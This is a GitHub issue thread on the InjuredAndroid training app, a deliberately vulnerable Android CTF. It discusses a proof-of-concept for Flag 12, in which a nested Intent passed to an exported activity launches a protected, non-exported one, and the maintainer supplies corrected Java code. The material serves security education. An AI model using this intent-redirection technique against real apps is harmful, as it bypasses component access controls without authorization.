search

B3nac / InjuredAndroid

A vulnerable Android application that shows simple examples of vulnerabilities in a ctf style.
Apache License 2.0
664 stars 144 forks source link

Flag 12 - java.lang.SecurityException: Permission Denial #13

Closed 0xMineGo800m closed 2 years ago

0xMineGo800m commented 3 years ago

When I launch b3nac.injuredandroid.ExportedProtectedIntent while holding another Intent inside in order for it to launch b3nac.injuredandroid.FlagTwelveProtectedActivity I keep getting:

java.lang.SecurityException: Permission Denial: starting Intent { cmp=b3nac.injuredandroid/.FlagTwelveProtectedActivity (has extras) } from ProcessRecord{391b647 22147:com.example.tcmintentlauncher/u0a228} (pid=22147, uid=10228) not exported from uid 10227

This is the code I used in my POC app's onCreate() method:

Intent intent = new Intent();
intent.setClassName("b3nac.injuredandroid", "b3nac.injuredandroid.FlagTwelveProtectedActivity");
intent.putExtra("totally_secure", "https://something.com");

Intent launchIntent = new Intent();
launchIntent.setClassName("b3nac.injuredandroid", "b3nac.injuredandroid.ExportedProtectedIntent");
launchIntent.putExtra("access_protected_component", intent);
startActivity(intent);

I also tried using the setComponent function instead of setClassName. Same result. Using flag11:// produced the same result as well.

I tried this on a rooted physical device (Android 8.0) and on an emulator as root (Android 9.0). Unless I add exported="true" to FlagTwelveProtectedActivity in AndroidManifest.xml and then repack the app, this activity will not launch...

Am I missing something?

B3nac commented 2 years ago

Hi @vangivang,

The main issue I see here is that the protected activity is being called first with startActivity(intent). The protected activity is accessible with the exported activity. 

Intent next = new Intent();
        next.setClassName("b3nac.injuredandroid", "b3nac.injuredandroid.FlagTwelveProtectedActivity");
        next.putExtra("totally_secure", "https://google.com");

        Intent start = new Intent();
        start.setClassName("b3nac.injuredandroid", "b3nac.injuredandroid.ExportedProtectedIntent");
        start.putExtra("access_protected_component", next);

        startActivity(start);

In the walk-through example the start intent is being called first which is the ExportedProtectedIntent activity followed by the next intent which accesses the FlagTwelveProtectedActivity.

B3nac commented 2 years ago

Changing startActivity(intent); to startActivity(launchIntent); should fix the permissions error. I hope this helps!